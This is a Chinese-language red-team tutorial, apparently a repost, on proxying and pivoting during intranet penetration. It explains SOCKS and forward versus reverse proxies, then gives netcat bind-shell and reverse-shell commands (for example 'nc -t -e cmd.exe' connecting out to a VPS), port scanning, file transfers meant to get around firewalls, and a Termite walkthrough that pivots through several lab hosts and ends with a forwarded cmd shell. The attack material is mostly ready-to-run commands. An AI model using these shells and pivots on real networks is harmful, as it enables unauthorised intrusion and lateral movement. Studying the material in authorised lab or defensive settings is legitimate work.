内网渗透-代理篇（上）

Delina

原文链接：内网渗透-代理篇（上）
利用代理工具将内网的流量代理到本地进行访问，这样就可以对内网进行下一步渗透，同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议)，工作在OSI参考模型的第5层（会话层）。使用TCP协议传输数据，因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本：

• SOCKS4支持TELNET、FTP、HTTP等TCP协议；
  
• SOCKS5支持TCP与UDP，并支持安全认证方案
  
  

---

代理一般分为正向代理和反向代理两类：
正向代理：已控服务器监听端口，通过这个端口形成一个正向的隧道，由代理机器代替主机去访问内网目标。但是内网入口一般处于DMZ区域有防火墙拦截，无法直接进入内网环境。
反向代理：由内网主机主动交出权限到代理机器，然后本地去连接形成反向代理。例如：VPS监听本地端口，已控内网服务器来连接此端口，形成一个隧道。如果内网设备连接外网，就无法回弹只能再想其他办法。

---

• 端口转发工具：NC、LCX、regGorg、venom、ngrock…
  
• 代理链工具：proxychains（Linux）、proxifier(windows)...
  

  ---

  
  
  

一、端口代理工具

1.LCX
LCX的使用方法传送门：【红队技能】Hash读取与端口转发

---

2.NetCat
NetCat，简称NC。除开端口转发以下还对NC的端口探测、文件传输、通信功能做了简单的演示。NetCat 官方地址：
http://netcat.sourceforge.net/

2.1 端口转发正向连接场景：目标防火墙不阻止外来流量。绑定本地的cmdshell在服务器的端口上然后本地去连接：
①服务器(192.168.1.98)执行命令将cmdshell绑定在本地5555端口上
nc -l -p 5555 -t -e cmd.exe
# -t是通过telnet模式执行 cmd.exe 程序，可省略②在内网主动连接服务器的5555端口，可直接获取目标的cmdshell
nc -nvv 192.168.1.98 5555
​

反向连接场景：目标设备在内网，防火墙阻止外来流量。绑定服务器的cmdshell并反向连接到vps(192.168.1.4)的TCP端口
①vps开启监听
nc -lp 5555
②服务器内网链接vps 5555端口，主动交出自己的cmdshell
nc -t -e cmd.exe 192.168.1.4 5555
​

---

2.2 端口探测NC可以作为客户端工具对目标进行端口探测：
​

1. nc -vz -w 2 192.168.1.10 9999
   
2. # -v可视化，-z扫描时不发送数据，-w超时几秒，后面跟数字

复制代码

使用NC工具批量探测服务器连续端口：
​

---

2.3 文件传输①正向传输：服务器先侦听端口，本地向服务器所在机器的该端口发送数据
​

1. #服务器启动监听，将9995端口接收到的数据都写到test文件里
   
2. nc -l -p 9995 > test
   
3. 
   
4. #本地往服务器的9995端口发送数据
   
5. nc 192.168.1.4 9995 < 1.txt

复制代码

② 反向传输：本地启动文件发送命令，服务器主动连接下载文件

1. <div class="blockcode"><blockquote>#本地启动文件发送命令，通过9992端口发送文件
   
2. nc -l -p 9992 < 1.php

复制代码

#服务器执行命令下载192.168.1.10:9992端口文件，并把文件存到当前目录文件夹2.php
nc 192.168.1.10 9992 >2.php


vps本地监听，服务器连接vps可以将文件下载到本地。可利用此特性躲避防火墙。
​

---

2.4 NC通信​

---

1. #开启监听
   
2. nc -l -p 12345
   
3. #连接。形成不加密聊天室
   
4. nc 192.168.1.10 12345

复制代码

3.Termite工具

1. #软件作者教学视频：
   
2. http://rootkiter.com/toolvideo/toolmp4/1maintalk.mp4
   
3. http://rootkiter.com/toolvideo/toolmp4/2socks.mp4
   
4. http://rootkiter.com/toolvideo/toolmp4/3lcxtran.mp4
   
5. http://rootkiter.com/toolvideo/toolmp4/4shell.mp4
   
6. http://rootkiter.com/toolvideo/toolmp4/5file.mp4
   
7. #项目地址:
   
8. http://rootkiter.com/Termite

复制代码

Termite是一款极度小巧灵活的跳板机。程序分为两部分,admin(控制端)和agent(代理端节点),admin和agent所有选项用途均一致：

1. -l 指定本地socks端口,等待远程连接
   
2. -c 指定远程socks机器ip
   
3. -p 指定远程socks机器端口

复制代码

---

3.1 本地模拟环境​
最终目的：通过Termite工具代理使物理机灵活穿梭于目标内网(目前物理机只能和win08桥接网卡通信)

---

3.2 正向连接
①win08本地监听
agent_win32.exe -l 6666
②win 7 本地监听
agent_win32.exe -l 7777
③xp 本地监听
agent_win32.exe -l 8888
④物理机连接win08
admin_Win32.exe -c 192.168.1.10 -p 6666
​

⑤通过域win08建立的隧道连接win 7
​

1. #连接win08成功后查看连接的隧道会话
   
2. show
   
3. #进入08的会话
   
4. goto 1
   
5. #连接win 7
   
6. connect 192.168.106.129 7777

复制代码

⑥连接XP
​

1. #进去win7的会话
   
2. goto 2
   
3. #连接xp
   
4. connect 169.254.228.204 8888

复制代码

⑦成功建立隧道。开始执行命令:
命令一：文件上传
​

1. # 传送文件。将本地c:\unintall.log文件传送到目标服务器命名为1.txt
   
2. goto 5
   
3. upfile c:\unintall.log 1.txt

复制代码

命令二：调用shell
​

1. #调用shell，将目标机器cmd shell转发到本地12345端口
   
2. shell 12345
   
3. #nc连接,得到cmdshell
   
4. nc 127.0.0.1 12345

复制代码